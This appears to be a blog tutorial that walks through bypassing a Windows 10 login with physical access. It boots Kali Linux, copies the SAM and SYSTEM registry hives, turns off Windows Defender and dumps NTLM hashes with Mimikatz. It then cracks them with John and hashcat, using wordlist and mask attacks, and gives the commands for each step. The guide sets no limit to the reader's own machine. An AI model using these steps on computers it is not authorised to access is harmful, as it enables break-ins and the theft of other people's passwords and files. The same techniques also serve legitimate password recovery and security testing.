In this step by step guide, you’ll learn how to grab Windows 10 hashes then recover the password with various hash cracking techniques. The toolset included in this guide is Kali Linux, Mimikatz, Hypervisors, Hashcat and Johnny.
There are plenty of guides out there for cracking Windows hashes. However many of them are outdated because Windows is making it more difficult to recover hashes. I wish to share the method that works with a modern Windows 10 system.
This guide assumes you have physical access to a Windows 10 computer and wish to bypass the operating system password. To begin you’ll need a few common gadgets ready so take note you have the following:
What you need to get started:
- Physical access to Windows 10 Target
- Kali Bootable USB
- USB external storage drive
- Another computer running as a Linux host w/ Windows VM or Windows host w/ Linux VM
Finding the Hashes
Plug in your Kali bootable USB to the target Windows system and boot from the USB instead of the Windows hard drive. This usually involves starting up the computer while spamming F keys, but you can look up your specific computer models BIOS boot-up key(s) and how to navigate their BIOS.
Once you see the screen above, you successful booted Kali Linux. In these photos I’m using an older version of Kali so yours might look a bit different. Login credentials with probably be kali:kali and if that doesn’t work try root:toor for username:password. Once logged in click on the “Files” icon:
Then navigate to the hard drive containing the Windows system on the computer. By clicking on “+ Other Locations” you’ll see all the hard disks on the computer. If their is only one hard drive in the computer it should be right under the “Computer” drive:
Side note: At this point you have access to all the files on the Windows computer. If having access to the Windows OS isn’t important to you, and you just want to recover files, you can access all the files right here!
To harvest the Windows hashes we’ll need these two files:
Navigate to these files by “Opening in Terminal”:
Then with the command
cd Windows/System32/config we change into the required directory. The with
cp SAM /root/Desktop/SAM and
cp SYSTEM /root/Desktop/SYSTEM we copy both files to our desktop:
Now is a good time to plug in that external USB drive:
Find the USB External Storage drive in the file manager and copy over the
SYSTEM files to it:
Dumping the Hashes
Next boot up that other Windows computer or Windows virtual machine:
Disable all the Windows Defender settings because today we’re going to be installing malware on purpose…
Download the latest release of Mimikatz. A very popular tool to help crack Windows systems:
Yes… We know it’s malware. But it’s our malware!
Open up Command Prompt and change directories into the
mimikatz/x64 location you just downloaded and extracted:
Plug in that external USB drive and copy over the
SYSTEM file into the
Finally we can dump the hashes with the following command:
lsadump::sam /system:SYSTEM /SAM:SAM
Scroll down a bit to find a Username’s hash, this computer has the username “Hacker”:
Cracking the Hashes
Since I’m running on a Linux host I’m going to switch over to that. Alternatively you can boot up a Kali Linux VM. Copy the hash file into a terminal then echo it into a file:
echo “c7e86705ea4642f5b8a6e34d86333955” > hash.txt
The simplest password cracking method that will crack basic passwords is with
hashcat using the
rockyou.txt word list This is pre-installed on Kali Linux and if you haven't already, unzip the word list with the following command:
Now run the following command to crack the hash!
john hash.txt /usr/share/wordlists/rockyou.txt — format=nt
Alternatively we can crack it the essentially the same way with
hashcat -m 1000 hash.txt /usr/share/wordlists/rockyou.txt
If you want to get a bit fancy we can launch a more sophisticated attack. Alot of passwords people likely use for their PC’s are likely a common word followed by some random numbers and letters at the end. We can account for many of these passwords by first finding a list of common words. This common-password list from SecLists is perfect for this.
Download this word list and put it in the same local directory as your hashes. Next we can use this word list with a
hashcat mask to append 4 random uppercase, lowercase, numbers and special characters with
?a . The full command to conduct the attack would look like so:
hashcat -m 1000 -a 6 hash.txt common-passwords-win.txt ?a?a?a?a
Thanks for Reading!
I hope this has helped you! If you know of a better method of cracking Windows hashes please let me know. If you have any comments or criticisms I’d also be happy to listen. Here is my email.
I did say a lot of the guides were outdated for this topic, but these two were definitely the most helpful: